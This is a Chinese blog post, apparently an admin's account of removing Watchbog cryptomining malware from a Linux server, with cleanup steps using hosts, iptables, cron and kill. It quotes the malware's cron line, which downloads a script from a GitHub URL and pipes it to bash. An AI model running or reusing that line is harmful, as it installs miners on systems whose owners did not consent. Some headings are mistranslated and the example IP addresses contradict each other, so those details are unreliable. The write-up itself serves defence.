服务器挖矿是什么意思,服务器被攻击挖矿怎么解决!

最近运气不好 , 有个服务器 。
被挖矿了 , 下面记录下问题发生的过程和解决方法 , 仅供参考 。
1.守望沼泽采矿病毒1 。服务器收到cpu告警 , cpu占用率100% 。登录服务器检查发现cpu被Watchbog进程占用 , 如下图所示:
2.取消会议 。
用kill杀了之后 , 这个进程还是会每隔一段时间自动起来 , 而且很明显是加入了预定任务 。如图所示检查:
*/9 * * * * (curl -fsSL https://raw.githubusercontent.com/luckysBoys/lucks/master/555.sh||wget -q -O- https://raw.githubusercontent.com/luckysBoys/lucks/master/555.sh||python -c 'import urllib2 as fbi;print fbi.urlopen("https://github.com/luckysBoys/lucks/blob/master/5.sh").read()'||curl -fsSL https://raw.githubusercontent.com/luckysBoys/lucks/master/555.sh||wget -q -O - https://raw.githubusercontent.com/luckysBoys/lucks/master/555.sh||curl -fsSLk https://raw.githubusercontent.com/luckysBoys/lucks/master/555.sh -m 90||wget -q -O - https://raw.githubusercontent.com/luckysBoys/lucks/master/555.sh --no-check-certificate -t 2 -T 60)|bash 打开这个URL , 发现它看起来像一堆base64的密文 , 即密文地址 。
3.预定任务的内容清除后 , 过一段时间再添加与上面相同的内容 , 所以这个病毒程序不是一般的病毒程序 。
4.后来了解 , 发现这个过程watchbog是一个植入式的挖矿程序 。这个程序会在cron下写脚本 , 并定期去pastebin.com下载木马开始挖矿 。如果删除不完全 , 这个挖掘程序还是会不定期的启动 。
二、解决过程 1 。修改/etc/hosts
通过观察计划任务的内容 , 我们可以发现几个恶意URL , 如下所示:
1)raw.githubusercontent.com2)github.com 首先在本地重定向这些地址 。
2 。防火墙控制传入和传出流量
攻击者携带的域名对应的ip地址是ip受限的 。
--比如raw.githubusercontent.com对应的ip为10.20.208.21iptables -A INPUT -s 10.20.209.21 -j DROPiptables -A OUTPUT -s 10.20.209.21 -j DROPiptables -A OUTPUT -j DROP -d 10.20.209.2--保存修改内容/sbin/service iptables save 3 。移除curl获取脚本
因为挖矿程序会用curl和wget命令下载病毒 , 所以我们需要在第一时间做好以下工作:
mv /usr/bin/curl /usr/bin/lrucmv /usr/bin/wget /usr/bin/tegw 如果确认病毒已经完全删除 , 我们可能就不需要手术了 。
4 。删除cron 中的相关任务
crontab -l /etc/cron.d /etc/cron.deny /etc/cron.monthly /etc/cron.daily /etc/cron.hourly /etc/crontab /etc/cron.weekly 我们需要仔细检查以上八个cron相关的文件目录 , 所有未知域名的信息都要彻底删除 。
1) crontab -l
2)/etc/cron.d
这个目录中添加了几个新命令:appache、root、system 。
3)/etc/cron.deny
未发现
4)/etc/cron .每月
5)/etc/cron.daily
6)/etc/cron .每小时
【服务器挖矿是什么意思,服务器被攻击挖矿怎么解决!】7)/etc/crontab
crontab文件中还提供了新的隐藏命令httpntp和ftpdns 。
8)/etc/cron.weekly
未发现
最后 , 用find再次过滤 , 确保完全清理干净 。
5 。删除恶意命令
同时我们还发现了恶意命令/bin/httpntp、/bin/ftpdns、/usr/bin/watchbog 。
我们之所以会看到这些恶意命令 , 是因为它们是在定时任务日志(/var/log/cron)中发现的 。
6 。删除tmp目录中的timesyncc.service文件
文件的详细内容如下:
7 。终止watchbog进程
ps -ef|grep watchbog|awk '{print $2}'|xargs kill -9 总结 面对挖掘过程 , 我简单总结了以下几点 。如果遇到挖掘过程 , 处理顺序如下:
1)检查预定任务以找到正在执行的挖掘程序的内容 。
2)将恶意URL中的所有主机重定向到本地区域(127.0.0.1)
3)仔细检查和审核与计划任务相关的文件和目录 , 并将其清除 。
4)删除恶意命令和包 , 重命名系统中被利用的命令 。
5)杀死对应的恶意进程(为什么最后?即使最早被杀 , 也会因为预定任务等原因自动启动 。)


    推荐阅读